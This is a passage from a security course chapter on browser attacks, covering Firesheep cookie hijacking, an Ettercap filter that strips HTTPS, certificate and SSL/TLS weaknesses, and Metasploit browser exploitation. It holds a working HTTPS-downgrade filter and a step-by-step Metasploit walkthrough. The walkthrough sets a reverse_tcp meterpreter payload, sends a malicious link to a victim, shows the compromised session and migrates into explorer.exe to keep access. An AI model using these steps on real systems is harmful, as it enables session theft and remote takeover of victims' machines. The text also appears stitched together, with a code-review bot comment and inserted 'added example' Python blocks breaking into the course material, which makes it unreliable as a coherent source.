Firesheep is an extension for the Firefox web browser (all versions) that uses a packet sniffer to intercept unencrypted cookies from websites such as Facebook and Twitter. As cookies are transmitted over networks, packet sniffing is used to discover identities, which are displayed in a sidebar in the browser; the user can instantly take on the login credentials of a victim by double-clicking on the victim's name.

Download Link: https://codebutler.github.io/firesheep/

Double-click the Firesheep icon of the target you wish to impersonate and you will have their cookies copied to your browser, and can access the target site. Firesheep sniffs session cookies that are not set with the Secure flag, because those are submitted over both HTTP and HTTPS channels. Once you impersonate the user's session, you can work until the session is invalidated, either by the user logging out or by the session timing out.

Bypassing HTTPS
HTTPS stands for Hypertext Transfer Protocol Secure, which means that whatever you communicate with the application server goes over a secure channel instead of in plain text. Therefore, an attacker cannot sniff your sensitive information such as username, password, session ID, credit card and debit card details, PII and so on. Generally, users recognize this by the padlock icon in the corner of the browser and think that the site is secure. Actually, that is not true: the lock icon does not mean the page is secure. We have a number of approaches to attack HTTPS pages. Here, we will talk about three:

• HTTP downgrade attacks
• Certificate attacks
• SSL/TLS attacks

Downgrade HTTPS to HTTP using Ettercap filters
An attacker can force the browser to access the HTTP (plain-text) version of the application instead of the HTTPS (encrypted) version, in order to view or sniff sensitive information such as PII, financial details, cookies, usernames and passwords.

Modern web applications are configured to send back a 302 response to HTTP requests and redirect the browser to the HTTPS version of the site. However, this is not safe; in fact it is the critical point where an attacker can take control and get in the middle (MITM). The following are the best tools to perform this attack.

• sslstrip
• Ettercap

What is Ettercap?
Ettercap is a free and open source network security tool for man-in-the-middle attacks on a LAN. It can be used for computer network protocol analysis and security auditing. It runs on various Unix-like operating systems including Linux, Mac OS X, BSD and Solaris, and on Microsoft Windows. It is capable of intercepting traffic on a network segment, capturing passwords, and conducting active eavesdropping against a number of common protocols.

What is MITM?
A man-in-the-middle attack (often abbreviated to MITM, MitM, MIM, MiM or MITMA) is an attack where the attacker secretly relays and possibly alters the communication between two parties who believe they are directly communicating with each other. One example is active eavesdropping, in which the attacker makes independent connections with the victims and relays messages between them to make them believe they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker.

Ettercap Filters?
Filters are a great feature of Ettercap. An attacker can do a lot of things while playing with them. Irongeek has played with Ettercap filters in the past to rewrite img tags (to know more, visit http://www.irongeek.com/i.php?page=security/ettercapfilter).

Let’s start with the below mentioned filter (assuming router is 192.168.0.1 and victim is 192.168.0.100): # Requests if (ip.proto == TCP && tcp.dst == 80) { # msg("[HTTP Response Filter] HTTP request seen.\n");

- if (search(DECODED.data, "https") || search(DATA.data, "https")){ + if (search(DECODED.data, "https")){ + replace("https", "http"); + msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n"); + } + if (search(DATA.data, "https")){ replace("https", "http"); msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n"); } @@ -50,7 +54,11 @@ if (ip.proto == TCP && tcp.dst == 80) {

# Response if (ip.proto == TCP && tcp.src == 80) { # msg("[HTTP Response Filter] HTTP response seen.\n"); - if (search(DECODED.data, "https") || search(DATA.data, "https")){ + if (search(DECODED.data, "https")){ + replace("https", "http"); + msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n"); + } + if (search(DATA.data, "https")){

WEB BROWSER ATTACKS Page 25 of 38 replace("https", "http"); msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n"); }
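Review bot: in both hunks the split of `if (search(DECODED.data, "https") || search(DATA.data, "https"))` into two separate `if` blocks leaves the two bodies identical, so the log cannot tell which buffer matched, and in the request hunk the message still reads `[HTTP Response Filter] *** HTTPS ZAPPED from request` although it fires on the request path (`tcp.dst == 80`); suggest a distinct prefix for the request branch and a buffer label in each message, e.g. `msg("[HTTP Request Filter] *** HTTPS ZAPPED from request (DATA)\n");`. Note also that `replace("https", "http")` rewrites every occurrence of the substring in the packet, not only URL schemes, so page text that merely mentions https is altered too; a comment stating that scope in the filter would help anyone reading it later.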

You should see the following output: ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Content filters loaded from hrf.ef... Listening on eth0... () (...)

[HTTP Response Filter] Encoding zapped. [HTTP Response Filter] Encoding zapped. [HTTP Response Filter] Encoding zapped. [HTTP Response Filter] *** HTTPS ZAPPED from response [HTTP Response Filter] Encoding zapped. [HTTP Response Filter] *** HTTPS ZAPPED from response [HTTP Response Filter] *** HTTPS ZAPPED from response (...)

How to hack Certificates

There are two attacks on certificates. In the first, we replace one certificate with another. Executing this attack is quite simple; however, the target can see it easily. The second type of attack is more complicated, and leverages a browser bug to present a certificate that the browser will incorrectly trust.

Fake Certificates

Using a fake certificate is not a hard task. If you have used a proxy, Ettercap or any other intercepting tool, the idea is much the same: show a fake certificate to the target's browser and act as the middleman for their communication, just as in a man-in-the-middle attack. Using a fake certificate is a popular attack, but it has a drawback: the user will see an error message saying that the certificate is invalid for the site. To perform this attack successfully, the user has to click through and add an exception. The attack depends entirely on the user; only if he accepts the untrusted-certificate dialog box can the attacker carry out his malicious task.

Flawed Certificate Validation

The second type of attack, the certificate validation attack, takes advantage of problems with how browsers manage certificate validation. For instance, this attack was possible in several iPhone applications around 2013. Nick Arnott found that a number of popular iPhone applications were not checking whether certificates were valid: when an attacker presented a self-signed certificate, or any certificate at all, the applications did not warn the user that the certificate was untrusted. Similar security vulnerabilities have been found in various Android applications too. Researchers from Stanford and Austin universities found similar flaws in the Chase mobile banking application. This app had a certificate-handling vulnerability: by performing this attack, an attacker can sniff credentials, credit card data or other information by providing a self-signed certificate and then monitoring the connection for sensitive data.

Vulnerabilities in SSL/TLS Layer

SSL and TLS are both encryption protocols used for secure web browsing. Like many other software implementations, they have some security issues as well, and these weaknesses can allow disclosure of everything on the communication channel. SSL and TLS are important and required because they are used to transmit critical cookie data and other sensitive information, such as credit card numbers, usernames and passwords, securely. Three such attacks that have gained notoriety are the BEAST attack, the CRIME attack and the Heartbleed attack.

BEAST Attack

BEAST stands for Browser Exploit Against SSL/TLS. SSL BEAST is an exploit first revealed in late September 2011 that leverages weaknesses in cipher block chaining (CBC) to exploit the Secure Sockets Layer (SSL) protocol. The CBC vulnerability can enable man-in-the-middle (MITM) attacks against SSL in order to silently decrypt and obtain authentication tokens, providing hackers with access to the data passed between a web server and the web browser accessing it. While SSL BEAST attacks affect only the Transport Layer Security (TLS) 1.0 version of SSL and not later versions such as TLS 1.1 and 1.2, TLS 1.0 remains the overwhelmingly predominant version used by both web servers and browsers. Following a JavaScript-based demonstration of the SSL BEAST attack by researchers Juliano Rizzo and Thai Duong, the developers of Google Chrome and other major web browsers started taking steps to create workarounds for mitigating the risks of SSL BEAST attacks.

CRIME Attack

Compression Ratio Info-leak Made Easy (CRIME) is an SSL/TLS security exploit against secret web cookies over connections using the HTTPS and SPDY protocols that also use data compression. When used to recover the content of secret authentication cookies, it allows an attacker to perform session hijacking on an authenticated web session, enabling further attacks. CRIME is a client-side attack, but the server can protect the client by refusing to use the feature combinations that can be attacked. For CRIME, the weakness is Deflate compression: the alert is issued if the server accepts Deflate compression.

HEARTBLEED Attack

The Heartbleed bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing information that, under normal conditions, is protected by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security over the Internet for applications such as the web, instant messaging (IM) and some virtual private networks (VPNs). The Heartbleed bug allows anyone on the Internet to read the memory of systems protected by vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users, and impersonate services and users.
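As an added example (not from the original course material), the following Python uses the standard ssl module to show both sides of this section: a client context that accepts any certificate, as the iPhone and Chase applications did, next to a hardened one, plus a check that maps an observed TLS session's version, cipher and compression setting to the BEAST and CRIME conditions described above. The CBC-cipher heuristic and the session values used in the checks are assumptions constructed for the example.

```python
import ssl
from typing import Dict, List, Optional

# Tokens in an OpenSSL cipher name that mark it as AEAD or stream, i.e. not CBC.
# Heuristic constructed for this example; it is not an exhaustive classifier.
_NON_CBC_TOKENS = ("GCM", "CCM", "CHACHA20", "RC4", "NULL")


def is_cbc_cipher(cipher: str) -> bool:
    """True when an OpenSSL-style cipher name denotes a CBC-mode cipher."""
    name = cipher.upper()
    return not any(tok in name for tok in _NON_CBC_TOKENS)


def assess_tls_session(version: str, cipher: str,
                       compression: Optional[str]) -> List[str]:
    """Map observed session parameters to the weaknesses named in the text:
    BEAST needs SSLv3/TLS 1.0 with a CBC cipher, CRIME needs TLS compression."""
    findings = []
    if version in ("SSLv3", "TLSv1") and is_cbc_cipher(cipher):
        findings.append("BEAST: %s with CBC cipher %s" % (version, cipher))
    if compression is not None:
        findings.append("CRIME: TLS compression %s accepted" % compression)
    return findings


def assess_socket(sock: ssl.SSLSocket) -> List[str]:
    """Same assessment taken from a live connection (not exercised offline)."""
    return assess_tls_session(sock.version(), sock.cipher()[0], sock.compression())


def insecure_client_context() -> ssl.SSLContext:
    """The flaw behind the iPhone/Chase findings: any certificate is accepted,
    so a self-signed certificate from a middleman passes without a warning."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be cleared before CERT_NONE
    ctx.verify_mode = ssl.CERT_NONE     # the chain is never validated
    return ctx


def hardened_client_context() -> ssl.SSLContext:
    """Validates chain and hostname, refuses TLS 1.0/1.1 and compression."""
    ctx = ssl.create_default_context()  # CERT_REQUIRED, check_hostname=True
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2  # removes the BEAST window
    ctx.options |= ssl.OP_NO_COMPRESSION          # removes the CRIME window
    return ctx


def validation_posture(ctx: ssl.SSLContext) -> Dict[str, bool]:
    """Summarise whether a context would have caught the attacks above."""
    return {
        "verifies_chain": ctx.verify_mode == ssl.CERT_REQUIRED,
        "checks_hostname": bool(ctx.check_hostname),
        "rejects_tls10": ctx.minimum_version >= ssl.TLSVersion.TLSv1_2,
        "rejects_compression": bool(ctx.options & ssl.OP_NO_COMPRESSION),
    }
```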

Attack on browser using Metasploit

Metasploit is not a new name; penetration testers have used this great tool for exploitation for many years. Metasploit is a penetration-testing framework with aspects designed for every level of the penetration-testing life cycle. Whether you are an exploit developer, an exploit consumer, a penetration tester or a system administrator, the Metasploit user interface simplifies the process of executing exploits and gives you an easier way to test your own systems. Usage is quite simple too, and all the information is freely available, so that a newcomer can understand what an exploit is, what its impact is, how it works, how to detect it, and has an easily repeatable place to go for testing.

Metasploit has auxiliary modules for discovery and enumeration that allow you to:

• Find vulnerable machines • Determine what services are running • Enumerate services • Gather specific information about protocols on systems

All of this lets you enumerate what is on the network, how vulnerable those hosts are and what types of vulnerability they have, completely free. We will see how you can use Metasploit for browser-based attacks: we will walk through exploiting a Windows 7 system with Metasploit and getting a remote shell.

Exploit with Metasploit

The easiest way to use Metasploit is the Kali Linux distribution, which you can download from http://www.kali.org/.

Kali is a standard penetration-testing distribution that includes many standard penetration-testing tools, scripts, frameworks and software such as ssh, apache, perl, python, Metasploit, etc. by default. Metasploit is written in Ruby, so if you wish to run it on Windows you can do that as well; get Metasploit from http://www.metasploit.com/.

If you are using Kali Linux, open a terminal and type msfconsole to start Metasploit. Your prompt should show msf >. Metasploit basics include a few things, such as:

• Searching module • Payload • Information about a module

To search for all modules for IE 8, enter search IE8, as shown below:

msf > search IE8
[!] Database not connected or cache not built, using slow search

Matching Modules
================

   Name                                                     Disclosure Date          Rank   Description
   ----                                                     ---------------          ----   -----------
   exploit/windows/browser/adobe_flashplayer_arrayindexing  2012-06-21 00:00:00 UTC  great  Player AVM Verification Logic Array Indexing Code Execution
   exploit/windows/browser/ie_cgenericelement_uaf           2013-05-03 00:00:00 UTC  good   MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability

To get more information about a module, enter info followed by the module name.

For instance:

msf> info exploit/windows/browser/ie_cgenericelement_uaf

       Name: MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability
     Module: exploit/windows/browser/ie_cgenericelement_uaf
    Version: 0
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Good


This exploit will work fine with following targets:

• IE 8 on Windows XP SP3 • IE 8 on Windows Vista • IE 8 on Windows Server 2003 • IE 8 on Windows 7

To select the best Metasploit exploit for a target, the first thing you need to do is go through the browser fingerprinting process. Learning about the target, such as its vendor name, version, plugin information, plugin versions, operating system information etc., can be done with the BeEF framework. For this instance, we are targeting a Windows 7 system running IE 8 on a 32-bit architecture. Once you have gathered the information, you can pick recent vulnerabilities available for the target's platform and use them. As we are using browser exploits, Metasploit will launch a web server to accept incoming browser requests. The Metasploit web server can have multiple endpoints, or URI paths, attached. This allows a single Metasploit instance to serve multiple exploits on a single network port without having to launch a separate server for each.

If you want to use a particular IP address, you will need to set the SRVHOST variable to that IP. Otherwise, you only need to set the SRVPORT, URIPATH and payload variables, which you do with set commands:

• set URIPATH /iebrowser • set SRVPORT 80 • show options • show targets • set payload windows/meterpreter/reverse_tcp • show options

This sets the path to /iebrowser and the server to listen on port 80. You may have a number of payload options, which you can see by typing the show payloads command. Otherwise, go with the meterpreter payload, which has many advanced features to facilitate post-exploitation.

• Meterpreter has two primary sub-options: bind shells and reverse shells.

Bind shells create a listener on the target system. Once the listener is started, the shell you have selected is attached to the port; when you connect to that port, the connection is completed and you have access to the shell. However, this process has some potential problems:

1. If the host is behind a NAT device or firewall, you won't be able to connect to the remote port even if it is listening.
2. Once that port is open, you have to be the first user to connect to it; if someone else connects first, you have just supplied a shell to someone else.

Basically, a bind shell opens up a new service on the target machine and requires the attacker to connect to it in order to get a session. A reverse shell, also known as a connect-back, is the exact opposite: it requires the attacker to set up a listener first on his box, the target machine acts as a client connecting to that listener, and finally the attacker receives the shell.

In the example below, we will have a look at the reverse shell:

set payload windows/meterpreter/reverse_tcp
show options

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Once you select the meterpreter reverse TCP shell, you need to configure EXITFUNC, LHOST and LPORT.

EXITFUNC - the default for the exploit is typically the best choice.

LHOST - set this to your IP address.

LPORT - set this to a port that most hosts can reach on the Internet.

The EXITFUNC option is useful when, after exploiting a box, you need a clean exit. It effectively sets a function hash in the payload that specifies a DLL and function to call when the payload is complete. There are four possible EXITFUNC values: none, seh, thread and process. seh is used when there is a structured exception handler (SEH) that will restart the thread or process automatically whenever an error occurs. By default it is set to thread or process, which call ExitThread or ExitProcess respectively. none calls GetLastError.

LHOST enables the payload to connect back to your system, and LPORT tells it the port to which traffic will be forwarded.

msf exploit(ie_cgenericelement_uaf) > set LHOST 10.103.54.54
LHOST => 10.103.54.54
msf exploit(ie_cgenericelement_uaf) > set LPORT 443
LPORT => 443
msf exploit(ie_cgenericelement_uaf) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 10.103.54.54:443
[*] Using URL: http://0.0.0.0:80/single
[*] Local IP: http://10.103.54.54:80/single
[*] Server started.

Now we are done: the server is running and waiting for connections. To get a shell, you just need to send the link http://10.103.54.54:80/single to the victim; once he clicks it, the payload triggers and the exploit is complete.

You can use the sysinfo command to gather more information from the target's computer:

[*] 10.103.54.24 ie_cgenericelement_uaf - Requesting: /single
[*] 10.103.54.24 ie_cgenericelement_uaf - Target selected as: IE 8 on Windows XP SP3
[*] 10.103.54.24 ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (751104 ) to 10.103.54.24
[*] Meterpreter session 2 opened (10.103.54.54:3333 -> 10.103.54.24:5425) at 2015-07-01 21:38:42 -0300
meterpreter > sysinfo
Computer: Hackit-PC
OS      : Windows 7 (Build 7600, ).
Arch    : x86
Language: en_US
meterpreter > ps
...
608 explorer.exe x86 1 Hackit-PC\user C:\Windows\Explorer.EXE
meterpreter > migrate 608
[*] Migrating to 608...
[*] Migration completed successfully.
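The order of events in the output above, a fetch of /single from 10.103.54.54:80 followed by a connect-back from the victim to the same host on port 3333, is exactly what the bind-versus-reverse-shell discussion predicts and is something a defender can look for in flow logs. The following Python is an added example, not part of the course or of Metasploit; it runs over constructed flow records, and the app field is assumed to come from a flow sensor's protocol identification.

```python
from typing import Dict, List, NamedTuple, Optional, Tuple


class Flow(NamedTuple):
    """One connection record as a flow sensor might export it (constructed)."""
    ts: float             # seconds, relative to the start of the capture
    src: str              # client address
    dst: str              # server address
    dport: int
    app: str              # protocol label assumed from the sensor: http/tls/unknown
    url: Optional[str] = None   # request path, only populated for http flows


WEB_PORTS = {80, 443, 8080}


def find_callbacks(flows: List[Flow], window: float = 120.0) -> List[dict]:
    """Flag a client that fetches a page from a host and within `window` seconds
    opens a non-web connection back to that same host.  That is the sequence a
    browser exploit plus a reverse_tcp stage leaves behind: the exploit server
    and the reverse handler are the same box (LHOST), on different ports."""
    last_fetch: Dict[Tuple[str, str], Flow] = {}
    alerts: List[dict] = []
    for f in sorted(flows, key=lambda x: x.ts):
        key = (f.src, f.dst)
        if f.app == "http":
            last_fetch[key] = f          # remember the most recent page fetch
            continue
        fetch = last_fetch.get(key)
        if fetch is None or f.ts - fetch.ts > window:
            continue                     # no recent fetch from this host
        if f.dport in WEB_PORTS and f.app == "tls":
            continue                     # ordinary HTTPS to the same site
        alerts.append({
            "client": f.src, "server": f.dst, "fetched": fetch.url,
            "callback_port": f.dport, "delay": f.ts - fetch.ts,
        })
    return alerts


# Constructed records mirroring the session in the text plus benign browsing.
SAMPLE_FLOWS = [
    Flow(0.0, "10.103.54.24", "10.103.54.54", 80, "http", "/single"),
    Flow(1.5, "10.103.54.24", "93.184.216.34", 80, "http", "/"),
    Flow(2.0, "10.103.54.24", "93.184.216.34", 443, "tls"),
    Flow(4.0, "10.103.54.24", "10.103.54.54", 3333, "unknown"),   # the stage
    Flow(900.0, "10.103.54.24", "10.103.54.54", 3333, "unknown"),  # outside window
]

if __name__ == "__main__":
    for a in find_callbacks(SAMPLE_FLOWS):
        print("possible reverse-shell callback:", a)
```

A plain-TCP stage on port 443, as with the handler started on 10.103.54.54:443 above, is still flagged because the sensor labels it unknown rather than tls.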

Now you have a shell open on the victim's system; you are inside the target and can do whatever you want. Since you have already migrated into the explorer.exe process, you can continue your post-exploitation work even if the victim closes the browser, until the system is switched off ;)

Metasploit Browser Autopwn

With security devices such as firewalls, IDS and UTM restrictions, and with patch management policies, exploitation of systems has become more and more difficult. However, one of the best remaining ways is to use client-side attacks. These require user interaction to exploit the system, and in most cases that can be achieved with social engineering techniques.

To carry out this attack we have a great tool, remember? Yes, the Metasploit framework: just use the browser_autopwn module. The screenshot below shows how to configure it and what default settings this module has.

As mentioned above, we will set LHOST to our IP address, SRVPORT to port 8080 and URIPATH to / to prevent Metasploit from setting up a random URL, and finally run it as shown in the screenshot below.

After the execution of this module, we will notice that different exploits for a variety of browsers start loading into our web server.


Now that the link has been created by Metasploit, we can share it with the victim through email, IM or any other method. Once the user clicks the malicious link, the autopwn module tries all of these exploits to see whether it can break into the client. Once an exploit succeeds, meterpreter sessions open as shown in the screenshot below.

Once you get a shell or meterpreter session, it is good to migrate to another process, so that if the browser crashes or is closed by the victim the meterpreter session or shell access remains active.

Metasploit IE-10 exploit

This Metasploit module exploits a use-after-free condition in Internet Explorer, as used in the wild as part of "Operation SnowMan". The module uses Flash Player 12 in order to bypass ASLR and DEP.

To exploit this version we will use exploit/windows/browser/ms14_012_cmarkup_uaf. Configuring and using this module is quite simple and similar to Browser Autopwn.

Follow similar steps to those above:

Step 1: use exploit/windows/browser/ms14_012_cmarkup_uaf

Step 2: show options (set LHOST, SRVHOST, SRVPORT, URIPATH)

Step 3: finally, run

Once done, a link will be generated by Metasploit and we can share the malicious link through email, IM or any other method. Once the user clicks the malicious link, the module tries these exploits to see whether it can break into the client. Once the exploit is done, a meterpreter session opens as shown in the screenshot below.

FIGURE 11: SCREENSHOT: TRYING TO EXPLOIT IE10 BY SENDING MULTIPLE PAYLOADS

FIGURE 12: SCREENSHOT: TRYING TO EXPLOIT IE10 BY SENDING MULTIPLE PAYLOADS


FIGURE 13: SCREENSHOT: SUCCESSFULLY EXPLOIT IE10 AND METERPRETER SESSION CREATED

FIGURE 14: SCREENSHOT: TAKING METERPRETER SESSION FOR POST EXPLOITATION

FIGURE 15: SCREENSHOT: METERPRETER GETUID AND SYSINFO COMMAND SUCCESSFULLY RUNNING

Reference

• https://browserhacker.com/
• http://en.wikipedia.org/wiki/Google_Chrome
• http://en.wikipedia.org/wiki/Web_browser
• http://en.wikipedia.org/wiki/Firefox
• https://en.wikipedia.org/wiki/Ettercap_%28software%29
• http://samy.pl/evercookie/
• http://www.webopedia.com/TERM/S/ssl_beast.html
• http://heartbleed.com
• https://en.wikipedia.org/wiki/HTTP_cookie
• https://en.wikipedia.org/wiki/HTTP_cookie#Domain_and_Path
• https://www.nethemba.com/blog/-/blogs/cookie-jar-overflow
• https://www.hacking-lab.com/misc/downloads/Cookie_Path_is_not_a_Security_Boundary.pdf
• http://wroot.org/posts/downgrade-https-connections-to-http-using-ettercap-filters/
• https://pentestlab.wordpress.com/2012/04/23/metasploit-browser-autopwn/
• http://www.engadget.com/2015/02/24/what-you-need-to-know-about-http-2/
